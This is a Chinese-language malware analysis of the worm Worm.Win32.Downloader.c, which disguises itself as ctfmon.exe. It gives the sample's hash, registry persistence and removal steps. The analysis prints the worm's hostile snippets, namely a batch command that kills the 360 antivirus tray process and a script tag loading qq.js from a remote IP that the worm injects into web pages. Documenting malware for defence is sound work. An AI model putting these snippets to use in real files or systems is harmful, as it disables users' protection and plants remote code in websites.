Worm.Win32.Downloader.c是由Microsoft Visual C++ 6.0編寫,通過網頁漏洞傳播的蠕蟲病毒。
基本介紹
- 外文名:Worm.Win32.Downloader.c
- 傳播方式:網頁漏洞
- 病毒類型:蠕蟲
- 檔案大小:45,056 位元組
- 編寫語言:Microsoft Visual C++ 6.0
- 加殼方式:N/A
基本信息,行為分析,
基本信息
Worm.Win32.Downloader.c(ctfmon.exe)分析解決
Worm.Win32.Downloader.c分析
前面我們介紹過阿達的
ctfmon.exe[樣本]
jisuanjibingdu/2007/1017/1353.html
下面看看ctfmon.exe的分析:
檔案名稱稱:ctfmon.exe
檔案大小:45,056 位元組
AV命名:Win32.HLLW.Rubbish (Dr.Web v4.44);
Worm.Win32.Downloader.c (kav 7.0.0.125)
加殼方式:N/A
編寫語言:Microsoft Visual C++ 6.0
病毒類型:蠕蟲
檔案MD5:6ede432a957fbbba10e2284819fe8d6e
樣本來源:劍盟 [病毒樣本] ctfmon不新不舊,剛剛好!
行為分析
1.釋放批處理:
%Systemroot%\system32\tmipo.bat (24 位元組)
用記事本打開.可見 taskkill /im 360tray.exe
然後進程cmd啟動conime.exe (好像是廢話)。
2.修改註冊表,添加開機啟動項
註冊表鍵: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
註冊表值: svchost
類型: REG_SZ
值: C:\Documents and Settings\Administrator\桌面\ctfmon.exe
註:值為ctfmon.exe的所在路徑
3.激活批處理tmipo.bat終止360安全衛士實時監控程式
命令行 taskkill /im 360tray.exe
4.然.後svchost.exe啟動wmiprvse.exe -Embedding
命令行:C:\WINDOWS\system32\wbem\wmiprvse.exe -Embedding
5.連線網路 218.75.91.248
6.遍歷磁碟,查找*.htm、*.PHP、*.ASP等網頁檔案,插入一段JS代碼:
<script language=javascript src=http://218.75.91.248/qq.js></script>
解決方法:
1、斷開網路,使.用wsyscheck終止並刪除偽ctfmon.exe
3、使用iframekill清除被插入代碼的網頁
其他變種:Worm.Win32.Downloader.h
[腳本]Kill_偽ctfmon_偽explorer
